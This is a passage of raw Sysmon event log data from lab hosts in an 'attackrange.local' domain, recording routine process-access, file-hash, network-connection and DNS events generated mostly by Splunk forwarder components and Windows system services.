08:05:00.253{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108498Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.253{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B5AC-615A-9102-00000000FC01}8224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108497Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.253{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5AC-615A-9102-00000000FC01}8224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108496Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.253{58E9C193-B5AC-615A-9102-00000000FC01}8224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108495Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.236{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A4900FC7B3D69B735EFAD558D1FEAC1,SHA256=626EB624F307904B1E39E81F1A284A70A5F484F8BF381AAD293885A19B1F1538,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108494Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.352{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51972-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000108493Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.352{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51972-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x800000000000000084015Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:00.053{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C3E46ED81F7583A2BF279D5826E3E2B6,SHA256=49EF856EA057FED3DF704CDC8B1A82D9C7599E0B7F327B4A527F76770FDF5EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084014Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:00.053{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEA01F0251A3754137D598CA0C9E36FA,SHA256=9FD7173EA6F49FBB669A418D2B8A2EE0A9164E22F56D83FBF7461143EC90D876,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108521Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5AD-615A-9202-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108520Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108519Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108518Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108517Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108516Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5AD-615A-9202-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108515Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.889{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5AD-615A-9202-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108514Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.890{58E9C193-B5AD-615A-9202-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108513Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.874{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D6FAA1D4C5DA39CD6D78A9914E81B41,SHA256=411A338D528C450D4513138BA460229550DFC696A415CF1D21AFC21F3237F77A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084018Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.674{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50207-false10.0.1.12-8000- 23542300x800000000000000084017Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:01.318{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC36608FEB53BF895FC86301B793719,SHA256=EB16CF0525407CA892ACA71692201D324F715F8074F582CD17BB8FA80D4DA872,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000108512Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.889{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net02600:9000:211e:9c00:a:da5e:7900:93a1;2600:9000:211e:1200:a:da5e:7900:93a1;2600:9000:211e:3e00:a:da5e:7900:93a1;2600:9000:211e:c600:a:da5e:7900:93a1;2600:9000:211e:5600:a:da5e:7900:93a1;2600:9000:211e:e00:a:da5e:7900:93a1;2600:9000:211e:9600:a:da5e:7900:93a1;2600:9000:211e:a600:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000108511Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.885{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net018.66.139.67;18.66.139.125;18.66.139.17;18.66.139.97;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000108510Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:01.274{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DE529A52BF914F7DCB008B27C30FAD6,SHA256=2078E30283571B7431185731B5EDBFEB3B461834076D589AC7FE38CC40AA8159,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108509Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.879{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61276- 354300x8000000000000000108508Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.879{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59094- 354300x8000000000000000108507Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.876{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58068- 354300x8000000000000000108506Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.724{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50564- 354300x8000000000000000108505Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.399{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51973-false10.0.1.12-8000- 23542300x8000000000000000108524Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:02.904{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E2329384294501E20AEE2CFAC642743,SHA256=2F8D4F7FEE1004BC5D9E4357C41C8F16B0135D303E1C09F5D085C5CA399FC7C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108523Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:02.889{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0A1B81AC2432EC03A9D13AB46178D76,SHA256=C2072092F3F80F60E2227CC69EF31E26AFF2A9C5F9F3D87EB521FA5B6B04A909,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084019Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:02.318{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA6AEBF0A1C5B4E8C9CADDE50F2CBC11,SHA256=4177F4EC4A35D8D92D847C734F4DE4143A005B5895E23DF360381BF75FF91C54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108522Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:02.089{58E9C193-B5AD-615A-9202-00000000FC01}61808308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108543Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.949{58E9C193-B5AF-615A-9402-00000000FC01}78085128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108542Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.902{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72CF9B03C425C1137F23471C4AC3BA68,SHA256=456EC9E527F95C7554A54574310367A88F82307F53616F068A739CC37AC5643C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084020Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:03.318{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC2E68A784AF7B2478AF87A1536B1DA,SHA256=C382520FCC9C55EE13032895A8190CDACF218EFA62EAD483DCEDE3D09CED9C0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108541Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.680{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5AF-615A-9402-00000000FC01}7808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108540Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.680{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108539Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.680{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108538Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.680{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108537Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 